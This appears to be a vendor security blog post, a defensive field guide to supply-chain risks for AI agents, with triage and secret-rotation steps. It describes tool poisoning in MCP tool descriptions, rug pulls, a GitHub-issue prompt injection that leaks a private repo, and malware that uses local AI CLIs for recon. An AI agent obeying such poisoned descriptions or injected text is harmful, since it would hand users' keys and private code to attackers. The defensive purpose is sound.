Supply chain risks for AI agents: malicious MCP servers, poisoned skills, and how to triage

You shipped an agent this year. It probably runs in Cursor or Claude Code, calls three or four MCP servers, has a handful of skills installed, and pulls a fresh npm or PyPI dependency about once a week. Something an LLM suggested.

Then one of the headlines from the last twelve months lands in your Slack. postmark-mcp was BCC'ing every email to a stranger. nx@21.5.0 shipped a postinstall script that used your own claude CLI to find your secrets. litellm==1.82.7 exfiltrated your AWS credentials. The Anthropic MCP Inspector had a 9.4 RCE. A VS Code fork was recommending malware because the namespace was unclaimed on Open VSX.

The question you actually want answered is not "is agent supply chain bad". You know it is. The question is:

Which class of attack does my stack actually expose me to that normal CI does not?
How do I tell if a thing is poisoned before I run it?
If I already ran it, what do I rotate first?

This post is that field guide. It is opinionated, it links every CVE and advisory so you can verify, and it ends with a triage checklist you can paste into a runbook.

Why the agent supply chain is wider than the normal one

For a normal Node service, your supply chain is package.json, your lockfile, your base image, and whatever your CI pulls. Bad enough.

An agent stack pulls from at least five injection vectors at once:

MCP servers. Long-lived processes the agent trusts to read files, send mail, query databases. Often installed with one line of JSON.
Skills, plugins, and IDE extensions. Cursor extensions, Claude Code skills, Open VSX entries. Auto-recommended by the IDE.
npm / PyPI dependencies. Same as ever, except now the agent picks the package name from a hallucination.
System prompts and tool descriptions. Plain text the model reads as instructions. Anyone who controls a tool description controls partial behavior.
Inbound data with prompt injection. GitHub issues, emails, Slack messages, PDFs, web pages. Read by the agent, executed as instructions.

Each is an injection vector. The same compromise that would have stolen one developer's npm token in 2023 now hands the attacker everything an agent has been authorized to do across half a dozen services. Worth re-reading our four threat models for agent security in 2026 for the framing.

The 2025-26 incidents, by category, with sources

Malicious MCP servers

postmark-mcp (npm, September 2025). A package impersonating the real Postmark product, no affiliation. The maintainer shipped fifteen benign releases to build trust, then in v1.0.16 on September 17, 2025 added a single line at line 177: Bcc: 'phan@giftshop.club'. Every outbound email through the server was silently BCC'd to the attacker until the package was removed on September 25, 2025. Roughly 1,643 downloads before removal, per public reporting. Sources: Snyk writeup, Postmark's own statement, The Hacker News.

Tool poisoning (Invariant Labs, April 2025). Malicious instructions hidden in a tool's description, not its code. The host model reads tool descriptions when it plans, so a poisoned description can steer the agent before the tool itself is ever called. Invariant demonstrated two patterns against Cursor: an add tool that exfiltrated SSH keys and MCP config secrets, and "tool shadowing", where a malicious MCP server rewrote how a trusted email tool behaved so all email was silently redirected. They also showed a "rug pull": a benign tool that mutates its description after install-time trust is granted. Source: Invariant Labs disclosure, summarized by Simon Willison.
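The rug-pull pattern suggests one cheap control: fingerprint each tool description when you approve it, then compare on later runs. A minimal sketch, assuming you can dump a description to text yourself. The helper names fingerprint and description_changed are hypothetical, and this is not a claim about how mcp-scan works internally.

```shell
# Sketch: pin a tool description by hash, then detect later changes.
# fingerprint and description_changed are hypothetical helper names.

# Print a SHA-256 hex digest of stdin, using whichever tool is installed.
fingerprint() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum | cut -d' ' -f1
  else
    shasum -a 256 | cut -d' ' -f1
  fi
}

# description_changed <pinned-hash> <current-description>
# Returns 0 (true) if the description no longer matches the pinned hash.
description_changed() {
  [ "$1" != "$(printf '%s' "$2" | fingerprint)" ]
}
```

Store the pinned hash next to the server entry at approval time. Any later mismatch means the description needs a fresh human read before the agent is allowed to use the tool again.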

GitHub MCP toxic flow (Invariant Labs, May 2025). A public GitHub issue with embedded prompt injection coerced a developer's agent (running the official GitHub MCP server) into reading a private repo and opening a public PR that leaked the contents. Source: Invariant writeup.

MCP infrastructure CVEs

CVE-2025-49596 · MCP Inspector unauthenticated RCE. The official Anthropic tool for testing MCP servers did not authenticate the client to the proxy. A malicious web page could trigger MCP commands on a developer workstation. CVSS 4.0 score 9.4. Affected versions: below 0.14.1. Disclosed by Oligo Security and published in NVD on June 13, 2025.

CVE-2025-6514 · mcp-remote OS command injection. The proxy that lets local MCP clients connect to remote servers. A malicious remote server could return a crafted authorization_endpoint URL during OAuth init; mcp-remote passed it straight to open(). CVSS 9.6. Affected 0.0.5 through 0.1.15, fixed in 0.1.16. Disclosed by JFrog Security Research in July 2025 when the package had 437,000+ weekly downloads.

Plus a steady stream of others on the authzed MCP breach timeline: CVE-2025-53109 and CVE-2025-53110 (Anthropic Filesystem MCP sandbox escape, August 2025), CVE-2025-59528 (Flowise critical STDIO flaw, September 2025), CVE-2025-53967 (Figma/Framelink MCP command injection, October 2025).

Compromised legitimate packages weaponizing AI CLIs

Nx "s1ngularity" (August 26, 2025). Malicious Nx releases in the 20.9.0 to 21.8.0 range shipped a postinstall script that called the locally installed claude, gemini, and Amazon q CLIs to recursively scan the filesystem for sensitive paths, writing them to /tmp/inventory.txt. The script then double-base64-encoded the result and pushed it to a public repo named s1ngularity-repository on the victim's own GitHub account. GitGuardian's analysis counted 2,349 distinct stolen secrets across 1,079 systems, 85% on macOS, 33% with an LLM CLI installed. A follow-on wave on August 28 made 10,767 previously private repos public, exposing roughly 82,901 more secrets. Sources: Nx postmortem, Wiz writeup, Snyk analysis.

This was one of the first npm attacks publicly documented to deliberately weaponize local AI CLIs. The CLI was the search tool. The installed claude binary was the malware's recon agent.
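If you find one of those repos on your account, the first job is to see exactly what left the machine. A minimal sketch of undoing the double base64 layer, assuming you have already downloaded the uploaded blob to a local file. The helper name decode_double_b64 is hypothetical.

```shell
# decode_double_b64: read a double-base64 blob on stdin, print the plaintext.
# Hypothetical helper; assumes a base64 binary that accepts --decode.
decode_double_b64() {
  base64 --decode | base64 --decode
}

# Example (the file name is a placeholder for whatever you downloaded):
#   decode_double_b64 < downloaded-blob.txt > leaked-plaintext.txt
```

Treat the decoded output as the rotation list: every secret and path in it was public for as long as the repo existed.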

Shai-Hulud (npm worm, September 2025). First disclosed September 15, 2025; CISA advisory September 23, 2025. A self-replicating npm worm: stole credentials, then used the victim's npm token to npm publish itself into other packages the victim maintained. Shai-Hulud 2.0 in November 2025 widened to 25,000+ malicious repositories across roughly 350 publisher accounts (Microsoft writeup, Sysdig). A May 11, 2026 resurgence spanned both npm and PyPI in one coordinated push: 170+ npm packages, 2 PyPI packages, 404 malicious versions, all chosen for relevance to AI developer tooling (Unit 42).

LiteLLM PyPI compromise (March 24, 2026). Versions litellm==1.82.7 and litellm==1.82.8 shipped a credential stealer that POSTed env vars, SSH keys, AWS, GCP, Azure credentials, Kubernetes tokens, and database passwords to models.litellm.cloud, an attacker-controlled domain unaffiliated with LiteLLM. PyPI quarantined the release within roughly 40 minutes. Clean release 1.83.0 shipped March 30 via a rebuilt CI/CD pipeline. Root cause was attributed to credential theft via the broader Trivy CI compromise. Sources: LiteLLM security update, Sonatype analysis.

Malicious skills, extensions, and IDE-recommendation hijack

MaliciousCorgi (January 26, 2026). Two VS Code Marketplace extensions sold as ChatGPT integrations: whensunset.chatgpt-china with 1,340,869 installs and zhukunpeng.chat-moss with 151,751 installs. They read every opened file, base64-encoded the contents, and POSTed to a server in China. They also supported remote-triggered exfiltration of up to 50 files and bundled four Chinese analytics SDKs for fingerprinting. Roughly 1.5M installs combined. Sources: The Hacker News, BleepingComputer.

GlassWorm (October 2025). Self-propagating malware on Open VSX, the registry used by Cursor, Windsurf, Google Antigravity, and other VS Code forks. It hides its payload in invisible Unicode characters that do not render, so the malicious code looks like blank lines in an editor or GitHub diff. First wave: seven extensions and roughly 36,000 downloads. It harvested npm, GitHub, and Git credentials and drained 49 crypto wallet extensions. Sources: Dark Reading, SecurityWeek.
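Invisible characters are invisible to reviewers, not to a byte scan. A minimal sketch that flags files containing zero-width characters or variation selectors by matching their UTF-8 byte sequences. The choice of ranges is an assumption for illustration, not a statement of exactly which code points GlassWorm used, and the helper name has_invisible_unicode is hypothetical.

```shell
# has_invisible_unicode <file>
# Returns 0 if the file contains UTF-8 bytes for:
#   zero-width characters   U+200B..U+200D  (e2 80 8b..8d)
#   variation selectors     U+FE00..U+FE0F  (ef b8 80..8f)
#   the U+E0100..U+E01FF range, which holds the supplementary
#   variation selectors                     (f3 a0 84..87 80..bf)
# Hypothetical helper; the ranges are an illustrative assumption.
has_invisible_unicode() {
  # Dump the file as space-separated hex bytes on one line, then match sequences.
  od -An -v -tx1 "$1" | tr -s ' \n' ' ' |
    grep -Eq 'e2 80 8[bcd]|ef b8 8[0-9a-f]|f3 a0 8[4-7] [89ab][0-9a-f]'
}
```

Expect false positives: U+FE0F also appears in ordinary emoji sequences. In extension source code, though, a long run of these characters is worth a manual look.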

IDE-recommendation hijack (Koi Security, January 6, 2026). When VS Code forks ship a hardcoded "recommended extension" list inherited from upstream, the upstream IDs (PostgreSQL, Azure Pipelines, Heroku, others) often do not exist on Open VSX. Anyone could claim those namespaces and the IDE would actively recommend the malicious extension. Koi pre-claimed six namespaces with placeholders and got over 1,000 trust-based installs in days. Sources: Koi writeup, The Hacker News.

Koi Security has also published broader research on agent skill marketplaces, cataloguing skills that look fine on the listing then quietly mutate or call out after install. The methodology is what matters more than any single store's headline count.

Slopsquatting

The category most specific to agents. Attackers register the names that LLMs hallucinate. The USENIX Security 2025 paper on package hallucinations tested 16 models across 576,000 code samples: hallucination rate roughly 21.7% on open-source models, 5.2% on commercial. Of the hallucinated names, roughly 38% are conflations like express-mongoose, 13% are typo variants, and 51% are pure fabrications. Trend Micro's slopsquatting writeup and Aikido both document real-world malicious packages registered under AI-suggested names that exfiltrated secrets on install.

If your agent runs in any kind of YOLO or auto-install mode, the suggestion is the install. The model has effectively become an unreviewed maintainer of your package.json.
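One way to put a reviewer back between the suggestion and the install is a plain allow-list. A minimal sketch, assuming a text file of reviewed package names, one per line. The file layout and the helper names is_reviewed_package and guarded_install are hypothetical.

```shell
# is_reviewed_package <name> <allowlist-file>
# Returns 0 only if <name> appears as an exact, whole line in the allow-list.
is_reviewed_package() {
  grep -Fxq -- "$1" "$2"
}

# guarded_install <name> <allowlist-file>
# Prints the decision. A real wrapper would run the install instead of echoing it.
guarded_install() {
  if is_reviewed_package "$1" "$2"; then
    echo "allow: $1"
  else
    echo "block: $1 (not reviewed)"
    return 1
  fi
}
```

Exact whole-line matching is the point: express being on the list must not let express-mongoose through.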

The five threat-model categories, condensed

Category	Example	First read
Malicious package	postmark-mcp 1.0.16, slopsquatted AI-suggested names	Brand new package, no history, install runs a network call
Compromised legitimate package	Nx s1ngularity, LiteLLM 1.82.7, Shai-Hulud	Trusted name, weird new postinstall, sudden version bump
Malicious MCP server	postmark-mcp, tool poisoning demos	New server in `mcp.json`, descriptions that mention secrets
Malicious skill or plugin	MaliciousCorgi, GlassWorm, Open VSX squats	Reads files it does not need, network egress at startup
Malicious system prompt or tool description	Invariant tool poisoning, GitHub toxic flow	Tool description contains imperative instructions to the model

How to triage before you run something

A short pre-flight that takes two minutes per install. Worth running on every new MCP server, every new skill, every new dependency the agent suggested for itself.

1. Scan your installed MCP servers

Invariant Labs ships mcp-scan for tool poisoning, cross-origin escalation, and rug-pull detection. Run it against your real configs:

bash

# One-off scan of your local MCP configs (Cursor, Claude Desktop, Windsurf)
uvx mcp-scan@latest

# Point at a specific config (swap @latest for a pinned version if you want repeatable runs)
uvx mcp-scan@latest scan ~/.cursor/mcp.json

2. Patch the two MCP infrastructure CVEs

If you have ever used MCP Inspector or mcp-remote, check the versions now:

bash

# CVE-2025-49596 fix
npm ls -g @modelcontextprotocol/inspector
npm i -g @modelcontextprotocol/inspector@latest   # must be >= 0.14.1

# CVE-2025-6514 fix
npm ls -g mcp-remote
npm i -g mcp-remote@latest                        # must be >= 0.1.16

Only point mcp-remote at HTTPS endpoints you actually trust.
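If you want the check in a script rather than by eye, compare versions numerically; plain string comparison gets 0.1.9 versus 0.1.16 wrong. A minimal sketch, assuming three dot-separated numeric fields. The helper name version_ge is hypothetical.

```shell
# version_ge <installed> <minimum>
# Returns 0 if <installed> is >= <minimum>, comparing up to three
# dot-separated numeric fields. Pre-release suffixes are not handled.
# Hypothetical helper name.
version_ge() {
  awk -v have="$1" -v want="$2" 'BEGIN {
    split(have, h, "."); split(want, w, ".")
    for (i = 1; i <= 3; i++) {
      if (h[i] + 0 > w[i] + 0) exit 0
      if (h[i] + 0 < w[i] + 0) exit 1
    }
    exit 0
  }'
}

# Example: version_ge "$installed_inspector_version" 0.14.1 || echo "upgrade MCP Inspector"
```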

3. Kill npm lifecycle scripts by default

Every postinstall attack in this post (Nx, Shai-Hulud, the LiteLLM equivalent) relied on a script running at install time. Switch the default off and opt in per package:

bash

# Globally disable npm lifecycle scripts unless you opt in
npm config set ignore-scripts true

# Per-install opt-out when you do not need build scripts
npm install --ignore-scripts <package>

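For pnpm 9+, use the explicit allow-list. Where the setting lives depends on the pnpm version (some releases read it from the pnpm field in package.json or from pnpm-workspace.yaml rather than .npmrc), so confirm against the pnpm docs for your release: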

ini

# .npmrc
side-effects-cache=false
onlyBuiltDependencies[]=esbuild
onlyBuiltDependencies[]=sharp

The npm docs cover --ignore-scripts under npm install.
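npm config set writes to your user-level config, so a teammate or a CI runner can silently be missing the setting. A minimal sketch of a guard you could run against a repo-level .npmrc, assuming you commit one. The helper name npmrc_ignores_scripts is hypothetical.

```shell
# npmrc_ignores_scripts <npmrc-file>
# Returns 0 if the file sets ignore-scripts=true on an uncommented line
# (whitespace around "=" is tolerated). Hypothetical helper name.
npmrc_ignores_scripts() {
  grep -Eq '^[[:space:]]*ignore-scripts[[:space:]]*=[[:space:]]*true[[:space:]]*$' "$1"
}

# Example: npmrc_ignores_scripts .npmrc || { echo "ignore-scripts is not enforced"; exit 1; }
```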

4. Close the dependency-confusion door

Scope your private namespace to your private registry, full stop:

ini

# .npmrc at repo root
# Route the @your-org scope to the private registry so it never resolves from public npm
@your-org:registry=https://npm.pkg.github.com
//npm.pkg.github.com/:_authToken=${GITHUB_TOKEN}

For Python, prefer a single internal index that mirrors PyPI over --extra-index-url. The latter still considers both indexes and the highest version wins, which is exactly the dependency-confusion bug. Reference: pip install docs.
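The extra-index pattern tends to creep back in through a copied requirements file. A minimal sketch of a check for it, assuming the setting appears either as the --extra-index-url option in a requirements file or as an extra-index-url key in a pip config file. The helper name uses_extra_index is hypothetical.

```shell
# uses_extra_index <file>...
# Returns 0 if any given file sets an extra index on an uncommented line,
# either as "--extra-index-url ..." or as "extra-index-url = ...".
# Hypothetical helper name.
uses_extra_index() {
  grep -Eq '^[[:space:]]*(--)?extra-index-url([[:space:]=]|$)' "$@"
}

# Example: uses_extra_index requirements.txt && echo "extra index in use, review it"
```

This sketch does not look at the PIP_EXTRA_INDEX_URL environment variable, which has the same effect.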

5. Read the tool descriptions like they are code

Because they are. Anything imperative addressed to "the model" or "the assistant", anything that mentions reading SSH keys, env vars, ~/.npmrc, or "system files for context" is the attack. The Invariant add-tool demo is the canonical example.
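A first pass can be automated before a human reads the rest. A minimal sketch that prints the red-flag phrases found in a description, assuming you pipe the description text in yourself. The phrase list is illustrative and drawn from the signals named above, and the helper name flag_description is hypothetical.

```shell
# flag_description: read a tool description on stdin and print each distinct
# red-flag phrase it contains. Returns 0 if anything was flagged, 1 if nothing
# matched. The pattern list is illustrative, not exhaustive.
flag_description() {
  hits="$(grep -Eio '~/\.ssh|~/\.npmrc|id_(rsa|ed25519)|env(ironment)? var|system files|the (model|assistant) (must|should)|do not (tell|mention)' | sort -u)"
  [ -n "$hits" ] && printf '%s\n' "$hits"
}
```

A clean result proves nothing, since an attacker can rephrase. A hit is a reason to stop and read the whole description.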

6. Audit what is even installed

A few one-liners worth keeping in a runbook:

bash

# Hunt for the s1ngularity drop-file on macOS dev boxes
# (the trailing slash makes find descend into /tmp, which is a symlink on macOS)
find /tmp/ -name 'inventory.txt' 2>/dev/null

# List every globally-installed npm package that declares a postinstall script
npm ls -g --depth=0 --parseable | while IFS= read -r dir; do
  jq -r 'select(.scripts.postinstall != null) | "\(.name): \(.scripts.postinstall)"' \
    "$dir/package.json" 2>/dev/null
done

# Enumerate the binaries every configured MCP server launches
find ~/.cursor ~/.claude -name 'mcp.json' \
  -exec jq -r '.. | .command? // empty' {} \; | sort -u

If you already ran the bad thing

Speed matters more than precision. Rotate in this order.

1. Every env var in the affected shell. AWS_*, GCP_*, AZURE_*, OPENAI_API_KEY, ANTHROPIC_API_KEY, GITHUB_TOKEN, NPM_TOKEN, plus ~/.npmrc, ~/.pypirc.
2. SSH keys. ~/.ssh/id_*. Generate new keys, remove the old public keys from GitHub and GitLab, then add the new ones.
3. Browser-stored credentials. Shai-Hulud and the AMOS-class stealers grab these.
4. GitHub PATs and fine-grained tokens. Revoke at https://github.com/settings/tokens. Check the account for unexpected new public repos with names like *s1ngularity-repository*. See token hygiene for AI agents for the longer version.
5. OAuth refresh tokens for every service the agent had access to. Slack, Linear, Stripe, GitHub Apps, Google Workspace. Revoke at the provider, not just locally.
6. Audit outbound traffic for the known IOCs: giftshop.club for postmark-mcp, models.litellm.cloud for LiteLLM 1.82.7-8, s1ngularity-repository repos for Nx.
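The IOC audit is a fixed-string search over whatever logs you have. A minimal sketch, assuming you can export proxy, DNS, or shell-history logs to text files. Which logs you have is an assumption about your setup, and the helper name scan_for_iocs is hypothetical.

```shell
# scan_for_iocs <file>...
# Prints file:line:text for every line that mentions one of the indicators
# named in this post. Returns 0 if any indicator was found, 1 otherwise.
# Hypothetical helper name.
scan_for_iocs() {
  grep -HnF \
    -e 'giftshop.club' \
    -e 'models.litellm.cloud' \
    -e 's1ngularity-repository' \
    -- "$@"
}

# Example: scan_for_iocs ~/.zsh_history ~/.bash_history
```

Fixed-string matching (-F) keeps the dots in the domain names literal, so the scan does not match lookalike strings by accident.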

If your agent ran with long-lived dotenv files full of provider keys, assume all of them are compromised. Cleaning a developer machine after Shai-Hulud is not a five-minute job.

The honest spot where a credential broker helps, and where it does not

Every incident on this list that successfully stole credentials worked because the credentials were sitting in plaintext somewhere the postinstall script could read them: ~/.npmrc, ~/.aws/credentials, ~/.ssh/id_ed25519, OPENAI_API_KEY in the process environment, MCP config JSON with hard-coded bearer tokens.
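You can get a rough picture of your own exposure by searching those same locations for token-shaped strings. A minimal sketch with approximate prefix patterns; the patterns are assumptions and will both miss tokens and flag harmless strings. The helper name find_plaintext_tokens is hypothetical.

```shell
# find_plaintext_tokens <file>...
# Lists the files that contain strings shaped like common provider tokens:
# AWS access key IDs, GitHub tokens, sk- style API keys, and long Bearer values.
# Patterns are rough approximations; expect false positives and misses.
find_plaintext_tokens() {
  grep -lE 'AKIA[0-9A-Z]{16}|gh[pousr]_[A-Za-z0-9]{36}|sk-[A-Za-z0-9_-]{20,}|Bearer [A-Za-z0-9._-]{20,}' -- "$@"
}

# Example: find_plaintext_tokens ~/.cursor/mcp.json ~/.npmrc ~/.aws/credentials
```

Every file it lists is something a postinstall script could have read with a single cat.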

A credential broker like Authsome narrows the blast radius of a few of these categories. You run authsome run -- <your agent command> and the agent process sees only a placeholder like OPENAI_API_KEY=authsome-proxy-managed. A local HTTPS proxy swaps in the real Authorization header as the request leaves. The agent never holds the key, so a postinstall script that greps the environment finds nothing useful.

Be honest about what this does and does not buy you.

It helps with:

Postinstall stealer (Nx, LiteLLM class). The shell the postinstall runs in does not have OPENAI_API_KEY or GITHUB_TOKEN exported as the real value. There is nothing in env to steal beyond the placeholder.
MCP config theft. Hard-coded bearer tokens in mcp.json are a common loot target. With a broker, the config holds a placeholder.
Global egress control during a run. Authsome supports a global allow/deny proxy mode per run, which lets you refuse calls to unexpected hosts at the proxy boundary.

It does not help with:

Code execution. A postinstall script that runs rm -rf does that whether or not your tokens are vaulted. Use --ignore-scripts, sandbox the install, run an SBOM scanner.
Prompt injection or tool poisoning at the model layer. That is what mcp-scan, request-level allow-lists, and structured tool-use guards exist for.
A malicious MCP server that is itself authorized to send mail. If the broker hands postmark-mcp a Postmark token because the agent asked it to, and the server BCCs every message, the broker did its job and the server still did the damage. Vetting the server is the control here, not the broker.
Browser-stored credentials and SSH private keys on disk. Those are not what the broker manages.
A pip install of a slopsquatted package, until and unless that package then tries to call out as your identity.

Defense in depth. A broker is one layer. Patching MCP Inspector, killing postinstall scripts, scoping registries, and reading tool descriptions are the others.

What I would do this week

If you have shipped an agent in the last twelve months:

Grep your machine for the specific bad versions. npm ls -g nx, pip show litellm, npm ls -g postmark-mcp, npm ls -g @modelcontextprotocol/inspector, npm ls -g mcp-remote.
Run mcp-scan against every mcp.json on the box.
Set npm config set ignore-scripts true globally. Opt back in per package.
Move provider keys out of dotfiles and env into a broker that injects at request time. Or whatever your equivalent control is. The point is to make plaintext theft useless.
Write the rotation order from the triage section into a runbook before you need it.
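The version check in the first item is easy to script once you have the installed version in hand. A minimal sketch covering only the exact releases this post names; Nx is left out because the post gives a range rather than a list. The helper name is_known_bad is hypothetical.

```shell
# is_known_bad <package> <version>
# Returns 0 if the pair matches a compromised release named in this post.
# Covers only exact versions stated above. Hypothetical helper name.
is_known_bad() {
  case "$1@$2" in
    postmark-mcp@1.0.16) return 0 ;;
    litellm@1.82.7|litellm@1.82.8) return 0 ;;
    *) return 1 ;;
  esac
}

# Example:
#   v="$(pip show litellm 2>/dev/null | awk '/^Version:/ {print $2}')"
#   is_known_bad litellm "$v" && echo "compromised litellm release installed"
```

Remember that global checks miss project-local installs, so run the same comparison against your lockfiles.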

The supply chain for agents is wider than for normal software because an agent reaches further. The fix is the same one we have always had, applied to more surfaces: trust less by default, scope what you do trust, audit what runs.

Next steps

Quickstart

Run your agent so it never holds the real key. Authsome injects credentials at the proxy boundary.

Four threat models for AI agent security

The sibling deep-dive on prompt injection, credential theft, tool abuse, and supply chain.

How prompt injection becomes credential exfiltration

Why a poisoned tool description ends with your tokens leaving the box.

MCP server authentication in 2026, ranked

What good MCP server auth looks like, so you can spot the bad ones earlier.

